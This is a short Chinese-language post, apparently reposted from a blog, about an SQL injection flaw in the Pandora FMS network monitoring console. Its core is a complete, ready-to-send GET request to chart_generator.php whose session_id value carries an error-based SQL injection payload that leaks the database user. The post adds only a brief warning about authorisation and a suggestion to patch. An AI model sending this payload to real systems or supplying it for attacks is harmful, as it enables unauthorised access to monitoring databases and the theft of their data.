本文共 702 字,大约阅读时间需要 2 分钟。
Pandora FMS是一款由西班牙Artica公司开发的网络监控系统。该系统通过直观的可视化界面,提供对网络、服务器、虚拟化基础架构和应用程序等的全面监控能力。
在Pandora FMS监控软件中,已发现存在严重的SQL注入漏洞。攻击者可通过chart_generator.php参数中注入恶意语句,获取数据库中的敏感信息,造成严重的安全隐患。
通过以下请求可以触发该漏洞:
GET /pandora_console/include/chart_generator.php?session_id=1%20OR%20(SELECT%206562%20FROM(SELECT%20COUNT(*),CONCAT(0x7176767171,(SELECT%20MID((IFNULL(CAST(CURRENT_USER()%20AS%20NCHAR),0x20)),1,54)),0x71627a6a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)--%20WIkG
此请求通过特定的参数结构,利用数据库特性执行恶意操作。攻击者可利用此漏洞获取敏感数据库信息,威胁系统安全。
在进行安全测试或实际攻击时,确保目标环境的合法性和授权范围。攻击行为可能导致法律后果。建议及时修复漏洞,增强系统安全性。
转载地址:http://utvfk.baihongyu.com/